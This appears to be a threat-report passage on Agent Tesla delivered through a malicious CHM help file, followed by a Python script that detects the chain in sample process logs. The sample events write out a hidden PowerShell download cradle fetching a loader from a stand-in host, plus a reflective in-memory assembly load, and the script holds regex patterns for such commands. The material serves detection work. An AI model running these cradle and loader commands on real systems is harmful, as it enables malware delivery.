Malicious Compiled HTML Help File Delivering Agent Tesla
The initial attack delivered a 7-Zip archive named ORDER OF CONTRACT-pdf.7z, which contained a single malicious compiled HTML help file, ORDER OF CONTRACT-pdf.chm (SHA256: 081fd54d8d4731bbea9a2588ca53672feef0b835dc9fa9855b020a352819feaa).
The CHM file contains obfuscated JavaScript that is executed when the file is opened.
The JavaScript in turn launches obfuscated PowerShell code, which runs in the background while the help file is displayed.
This first-stage PowerShell payload downloads a second-stage payload from the internet: a PowerShell loader.
When the loader runs, it loads Agent Tesla directly into memory, so the final payload is never written to disk as a standalone executable.
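The chain above (help file opened, JavaScript spawning hidden PowerShell, a download cradle fetching a loader, and the loader reflectively loading the final payload) leaves a recognisable trail in process-creation telemetry. The following Python is an added example, not code from the original post or from the campaign: it scans a handful of constructed Sysmon-style process-creation records for hh.exe (the Windows HTML Help host that opens .chm files) spawning a script host, decodes any `-EncodedCommand` payload so the base64-wrapped script is inspected too, and grades each event. The field names, sample command lines and the `example.invalid` URL are assumptions made for the example.

```python
import base64
import re

# Constructed Sysmon-style process-creation records (Event ID 1 fields); not real
# telemetry. The -enc payload of the second record is built here so the decoder
# below can be exercised end to end.
ENCODED_STAGE1 = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/loader.ps1')"
    .encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    # The CHM opened through the HTML Help host (benign on its own).
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\hh.exe",
     "CommandLine": r'"C:\Windows\hh.exe" "C:\Users\u\Downloads\ORDER OF CONTRACT-pdf.chm"'},
    # Embedded JavaScript launching hidden, encoded PowerShell (first stage).
    {"ParentImage": r"C:\Windows\hh.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -nop -ep bypass -enc " + ENCODED_STAGE1},
    # The downloaded loader reflectively loading a .NET assembly in memory.
    {"ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -c "[Reflection.Assembly]::Load([Convert]::FromBase64String($b)).EntryPoint.Invoke($null,$null)"'},
    # Unrelated benign activity.
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe readme.txt"},
]

# Children of hh.exe that have no business being launched by a help file.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}

# Command-line markers for each link of the chain; labels become finding reasons.
CRADLE_PATTERNS = [
    (re.compile(r"Invoke-Expression|(?<![\w-])IEX(?![\w-])", re.I), "Invoke-Expression"),
    (re.compile(r"DownloadString|DownloadFile|DownloadData|Invoke-WebRequest|(?<![\w-])iwr(?![\w-])", re.I),
     "web download cradle"),
    (re.compile(r"Reflection\.Assembly\]::Load|FromBase64String", re.I), "in-memory assembly load"),
    (re.compile(r"-w(?:indowstyle)?\s+hidden|-nop(?![\w-])|-(?:ep|executionpolicy)\s+bypass", re.I),
     "hidden window / policy bypass"),
]
# -e/-ec/-en/-enc/-EncodedCommand followed by a base64 blob (PowerShell accepts the prefixes).
ENC_RE = re.compile(r"(?<!\S)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
USER_CHM_RE = re.compile(r"\\users\\[^\\]+\\(?:downloads|appdata|desktop)\\[^\"]*\.chm", re.I)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script (base64 of UTF-16LE) or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(ev):
    """Return the list of reasons an event looks like part of the CHM chain."""
    parent, child = basename(ev["ParentImage"]), basename(ev["Image"])
    cmd = ev["CommandLine"]
    reasons = []
    if parent == "hh.exe" and child in SCRIPT_HOSTS:
        reasons.append(f"hh.exe spawned {child}")
    if child == "hh.exe" and USER_CHM_RE.search(cmd):
        reasons.append("hh.exe opened a .chm from a user-writable directory")
    scan_text = cmd
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("decoded -EncodedCommand payload")
        scan_text += "\n" + decoded  # inspect the decoded script as well as the raw line
    for pattern, label in CRADLE_PATTERNS:
        if pattern.search(scan_text):
            reasons.append(label)
    return reasons


def severity(reasons):
    high = {"web download cradle", "in-memory assembly load"}
    if any(r.startswith("hh.exe spawned") for r in reasons) or high & set(reasons):
        return "high"
    return "low" if reasons else "none"


def triage(events):
    """Return [(index, severity, reasons)] for every event with at least one hit."""
    out = []
    for i, ev in enumerate(events):
        reasons = analyze_event(ev)
        if reasons:
            out.append((i, severity(reasons), reasons))
    return out


if __name__ == "__main__":
    for i, sev, reasons in triage(SAMPLE_EVENTS):
        print(f"event {i}: {sev}: " + "; ".join(reasons))
```

The parent/child pairing is the cheapest and most robust signal: a help file that spawns powershell.exe is almost never legitimate, whereas the download-cradle and reflective-load strings can be obfuscated away, which is why they only raise the severity rather than being required. Decoding `-EncodedCommand` before matching matters for exactly this sample, since the raw command line of the first stage shows nothing but base64.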